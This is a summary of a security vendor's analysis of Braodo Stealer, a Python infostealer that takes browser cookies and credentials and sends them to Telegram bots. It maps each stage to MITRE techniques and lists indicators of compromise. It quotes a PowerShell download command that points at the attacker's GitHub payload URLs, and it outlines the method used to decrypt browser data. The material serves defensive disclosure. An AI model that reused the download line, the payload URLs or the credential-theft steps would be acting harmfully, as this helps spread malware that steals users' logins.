Threat Research

Echoes of Braodo: Tales from the Cyber Underworld

K7computing

Braodo Stealer is a Python-based information stealer that covertly collects cookies, credentials, and system data, then exfiltrates the results to Telegram bots. The post traces Braodo’s multi-stage delivery—from a ZIP containing an obfuscated BAT file to startup persistence, a GitHub-downloaded payload, and Python-based data exfiltration of browser data and host information. #BraodoStealer #VietnameseMalware #TelegramAPI

Keypoints

  • Braodo Stealer is a Python-based information stealer that collects cookies, saved credentials, and system data into a ZIP file for exfiltration.
  • The dropper uses a BOM-prefixed BAT file to disguise content and launches a PowerShell downloader from GitHub to fetch additional payloads.
  • Persistence is achieved by writing WindowsSecure.bat into the Startup folder to survive reboots.
  • The malware downloads Document.zip from GitHub, which contains the actual Python payload (sim.py) executed by python.exe.
  • It enumerates browsers, retrieves login data and cookies via AES decryption, and gathers system information (IP, user name, OS, etc.) using ipinfo.io.
  • Collected data is written to text files, compressed into a ZIP, and exfiltrated to Telegram via API bots before being deleted from disk.
  • The campaign emphasizes evasion and frequent GitHub updates, with security products like K7 Total Security recommended for protection.

MITRE Techniques

  • [T1105] Ingress Tool Transfer – The bat file is downloaded from GitHub by PowerShell: “Invoke-WebRequest -URI https://github.com/ohlisit/123/raw/main/update.bat -OutFile …”
  • [T1059.001] PowerShell – The malware “starts the PowerShell process and downloads a bat file from GitHub URL” to fetch further payloads.
  • [T1547.001] Boot or Logon Autostart Execution – Creates “WindowsSecure.bat” in the Startup folder for persistence: “WindowsSecure.bat in the Startup folder for persistence.”
  • [T1082] System Information Discovery – Retrieves “computer name, current login user name, windows version, time of computer, IP of system” via ipinfo.io.
  • [T1555.003] Credentials from Web Browsers – Checks browser paths, decrypts “Login data” and “Cookies” using AES with a master key from Local State.
  • [T1560.001] Archive Collected Data – After collecting data, “converts the files into a zip file” for exfiltration.
  • [T1071.001] Web Protocols – Uses Telegram API bots to transmit stolen data: “Telegram API bots URL strings” used to send data.
  • [T1041] Exfiltration – Sends the zipped data to a Telegram channel: “sends that zip file to the Telegram channel.”
  • [T1027] Obfuscated/Compressed Files or Information – The initial BAT is hidden by BOM: “starts with unicode ‘FF FE’ which uses BOM , to show the batch file data as unreadable characters.”

Indicators of Compromise

  • [File Name] health-records-x-ray-n, WindowsSecure.bat – Part of the initial ZIP payload and startup persistence
  • [Hash] 4BA8BDD684441EF9F6F9AC7DE7EDB28B – Associated with the health-records-x-ray-n sample
  • [URL] https://github.com/ohlisit/123/raw/main/update.bat, https://github.com/ohlisit/123/raw/main/Document.zip – Download sources used by the malware
  • [Domain] ipinfo.io – Used to fetch system information (IP, host data)
  • [URL] https://api.telegram.org – Used for exfiltration to Telegram via API bots
  • [Process] python.exe, powershell.exe – Processes spawned during execution and payload deployment

Read more: https://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint